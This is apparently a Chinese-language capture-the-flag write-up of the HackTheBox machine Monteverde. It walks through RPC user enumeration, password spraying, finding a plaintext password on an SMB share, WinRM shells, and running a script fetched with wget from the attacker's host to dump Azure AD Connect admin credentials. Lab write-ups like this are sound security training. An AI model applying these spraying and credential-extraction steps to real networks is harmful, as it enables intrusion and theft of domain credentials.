title: HackTheBox-Monteverde author: Mosaic Theory layout: true categories: 漏洞实验 tags:
• Active Directory
Recon:
# Nmap 7.92SVN scan initiated Thu May 26 13:28:07 2022 as: nmap -sC -sV -Pn -p- -oA nmap.txt 10.10.10.172
Nmap scan report for 10.10.10.172
Host is up (0.60s latency).
Not shown: 65516 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-05-26 05:37:52Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49676/tcp open msrpc Microsoft Windows RPC
49693/tcp open msrpc Microsoft Windows RPC
49744/tcp open msrpc Microsoft Windows RPC
Service Info: Host: MONTEVERDE; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 311:
|_ Message signing enabled and required
|_clock-skew: -1s
| smb2-time:
| date: 2022-05-26T05:38:55
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://google.com/submit/ .
# Nmap done at Thu May 26 13:39:38 2022 -- 1 IP address (1 host up) scanned in 691.10 secondsSMB是不允许匿名访问的:
$ smbmap -H 10.10.10.172
[+] IP: 10.10.10.172:445 Name: 10.10.10.172 那么只能从RPC下手:
$ rpcclient -U "" -N 10.10.10.172
rpcclient $> exit
$ rpcclient -U "" -N 10.10.10.172 -c enumdomusers > user.txt
$ cat user.txt
user:[Guest] rid:[0x1f5]
user:[AAD_987d7f2f57d2] rid:[0x450]
user:[mhope] rid:[0x641]
user:[SABatchJobs] rid:[0xa2a]
user:[svc-ata] rid:[0xa2b]
user:[svc-bexec] rid:[0xa2c]
user:[svc-netapp] rid:[0xa2d]
user:[dgalanos] rid:[0xa35]
user:[roleary] rid:[0xa36]
user:[smorgan] rid:[0xa37]$ cat user.txt | awk -F "[" '{print $2}' > newuser.txt
$ cat newuser.txt| awk -F "]" '{print $1}' > exitusers.txt
$ cat exitusers.txt
Guest
AAD_987d7f2f57d2
mhope
SABatchJobs
svc-ata
svc-bexec
svc-netapp
dgalanos
roleary
smorgan这样我就获取到了一个用户名字典。
SMB:
继续在rpc搜索了一番,并没有找到任何密码, 我尝试对用户进行喷涂,就以收集到的用户名字典既当用户名亦当字典:
$ crackmapexec smb 10.10.10.172 -u user.txt -p user.txt --continue-on-success
SMB 10.10.10.172 445 MONTEVERDE [*] Windows 10.0 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False)
<skip>..............................................
SMB 10.10.10.172 445 MONTEVERDE [+] MEGABANK.LOCAL\SABatchJobs:SABatchJobs
命中一个:
$ smbmap -H 10.10.10.172 -u SABatchJobs -p SABatchJobs
[+] IP: 10.10.10.172:445 Name: 10.10.10.172
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
azure_uploads READ ONLY
C$ NO ACCESS Default share
E$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
SYSVOL READ ONLY Logon server share
users$ READ ONLY$ smbmap -H 10.10.10.172 -u SABatchJobs -p SABatchJobs -R 'azure_uploads'
[+] IP: 10.10.10.172:445 Name: 10.10.10.172
Disk Permissions Comment
---- ----------- -------
azure_uploads READ ONLY
.\azure_uploads\*
dr--r--r-- 0 Fri Jan 3 20:43:36 2020 .
dr--r--r-- 0 Fri Jan 3 20:43:36 2020 ..$ smbmap -H 10.10.10.172 -u SABatchJobs -p SABatchJobs -R 'users$'
[+] IP: 10.10.10.172:445 Name: 10.10.10.172
Disk Permissions Comment
---- ----------- -------
users$ READ ONLY
.\users$\*
dr--r--r-- 0 Fri Jan 3 21:12:48 2020 .
dr--r--r-- 0 Fri Jan 3 21:12:48 2020 ..
dr--r--r-- 0 Fri Jan 3 21:15:23 2020 dgalanos
dr--r--r-- 0 Fri Jan 3 21:41:18 2020 mhope
dr--r--r-- 0 Fri Jan 3 21:14:56 2020 roleary
dr--r--r-- 0 Fri Jan 3 21:14:28 2020 smorgan
.\users$\mhope\*
dr--r--r-- 0 Fri Jan 3 21:41:18 2020 .
dr--r--r-- 0 Fri Jan 3 21:41:18 2020 ..
fw--w--w-- 1212 Fri Jan 3 22:59:24 2020 azure.xml$ smbclient -U SABatchJobs //10.10.10.172/users$ SABatchJobs -c 'get mhope/azure.xml azure.xml'
getting file \mhope\azure.xml of size 1212 as azure.xml (1.2 KiloBytes/sec) (average 1.2 KiloBytes/sec)
$ cat azure.xml
��<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
<Obj RefId="0">
<TN RefId="0">
<T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredentialT>
<T>System.ObjectT>
TN>
<ToString>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredentialToString>
<Props>
<DT N="StartDate">2020-01-03T05:35:00.7562298-08:00DT>
<DT N="EndDate">2054-01-03T05:35:00.7562298-08:00DT>
<G N="KeyId">00000000-0000-0000-0000-000000000000G>
<S N="Password">4n0therD4y@n0th3r$S>
Props>
Obj>
Objs> $ echo 4n0therD4y@n0th3r$ > passwd.txt
$ crackmapexec smb 10.10.10.172 -u mhope -p passwd.txt --continue-on-success|grep '[+]'
SMB 10.10.10.172 445 MONTEVERDE [+] MEGABANK.LOCAL\mhope:4n0therD4y@n0th3r$ $ smbmap -H 10.10.10.172 -u mhope -p 4n0therD4y@n0th3r$
[+] IP: 10.10.10.172:445 Name: 10.10.10.172
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
azure_uploads READ ONLY
C$ NO ACCESS Default share
E$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
SYSVOL READ ONLY Logon server share
users$ READ ONLYWINRM:
$ crackmapexec winrm 10.10.10.172 -u mhope -p passwd.txt --continue-on-success|grep '[+]'
WINRM 10.10.10.172 5985 MONTEVERDE [+] MEGABANK.LOCAL\mhope:4n0therD4y@n0th3r$ (Pwn3d!)$ evil-winrm -i 10.10.10.172 -u mhope -p 4n0therD4y@n0th3r$
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\mhope\Documents> *Evil-WinRM* PS C:\Users\mhope\Documents> cd ../desktop
*Evil-WinRM* PS C:\Users\mhope\desktop> ls
Directory: C:\Users\mhope\desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 1/3/2020 5:48 AM 32 user.txt
*Evil-WinRM* PS C:\Users\mhope\desktop> cat user.txt
4961....................................*Evil-WinRM* PS C:\Users\mhope\desktop> ipconfig /all
Windows IP Configuration
Host Name . . . . . . . . . . . . : MONTEVERDE
Primary Dns Suffix . . . . . . . : MEGABANK.LOCAL
Node Type . . . . . . . . . . . . : Hybrid
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
DNS Suffix Search List. . . . . . : MEGABANK.LOCAL$ bloodhound-python --zip -c All -u mhope -p 4n0therD4y@n0th3r$ -ns 10.10.10.172 -dc MONTEVERDE.MEGABANK.LOCAL -d MEGABANK.LOCAL
INFO: Found AD domain: megabank.local
INFO: Connecting to LDAP server: MONTEVERDE.MEGABANK.LOCAL
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: MONTEVERDE.MEGABANK.LOCAL
INFO: Found 13 users
INFO: Connecting to GC LDAP server: MONTEVERDE.MEGABANK.LOCAL
INFO: Found 65 groups
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: MONTEVERDE.MEGABANK.LOCAL
INFO: Done in 00M 52S
INFO: Compressing output into 20220526142408_bloodhound.zip*Evil-WinRM* PS C:\Users\mhope\desktop> net user mhope
User name mhope
Full Name Mike Hope
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 1/2/2020 4:40:05 PM
Password expires Never
Password changeable 1/3/2020 4:40:05 PM
Password required Yes
User may change password No
Workstations allowed All
Logon script
User profile
Home directory \\monteverde\users$\mhope
Last logon 1/3/2020 6:29:59 AM
Logon hours allowed All
Local Group Memberships *Remote Management Use
Global Group memberships *Azure Admins *Domain Users
The command completed successfully.
*Evil-WinRM* PS C:\Users\mhope\desktop> Azure:
mhope是组Azure Admins成员。关于Azure,可学习:
https://blog.xpnsec.com/azuread-connect-for-redteam/摘自以上原文:
第一个,可以说是最有趣的是密码哈希同步 (PHS),它将用户帐户和密码哈希从 Active Directory 上传到 Azure。第二种方法是直通身份验证 (PTA),它允许 Azure 将身份验证请求转发到本地 AD,而不是依赖于上传哈希。最后,我们有了联合身份验证,这是我们多次看到的传统 ADFS 部署。PHS……闻起来像 DCSync要开始我们对 PHS 的分析,我们应该查看负责处理密码哈希同步的程序集之一,Microsoft.Online.PasswordSynchronization.dll. 此程序集可以在 Azure AD Sync 的默认安装路径中找到C:\Program Files\Microsoft Azure AD Sync\Bin。
*Evil-WinRM* PS C:\Program Files\Microsoft Azure AD Sync\Bin> ls *Microsoft.Online.PasswordSynchronization.dll*
Directory: C:\Program Files\Microsoft Azure AD Sync\Bin
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 8/31/2018 4:54 PM 136248 Microsoft.Online.PasswordSynchronization.dll
*Evil-WinRM* PS C:\Program Files\Microsoft Azure AD Sync\Bin> C:\Program Files\Microsoft Azure AD Sync\Bin\mcrypt.dll负责密钥管理和解密此数据的程序集的引用:
*Evil-WinRM* PS C:\Program Files\Microsoft Azure AD Sync\Bin> ls *mcrypt.dll*
Directory: C:\Program Files\Microsoft Azure AD Sync\Bin
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 8/31/2018 4:54 PM 335744 mcrypt.dll
*Evil-WinRM* PS C:\Program Files\Microsoft Azure AD Sync\Bin> 我直接引用了大佬的POC脚本:
*Evil-WinRM* PS C:\Program Files\Microsoft Azure AD Sync\Bin> cd /programdata
*Evil-WinRM* PS C:\programdata> wget http://10.10.16.11/Get-AzureADPasswd.ps1 -O Get-AzureADPasswd.ps1
*Evil-WinRM* PS C:\programdata> . .\Get-AzureADPasswd.ps1
Domain: MEGABANK.LOCAL
Username: administrator
Password: d0m@in4dminyeah!
*Evil-WinRM* PS C:\programdata> $ evil-winrm -i 10.10.10.172 -u administrator -p d0m@in4dminyeah!
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> type ../desktop/root.txt
129............................................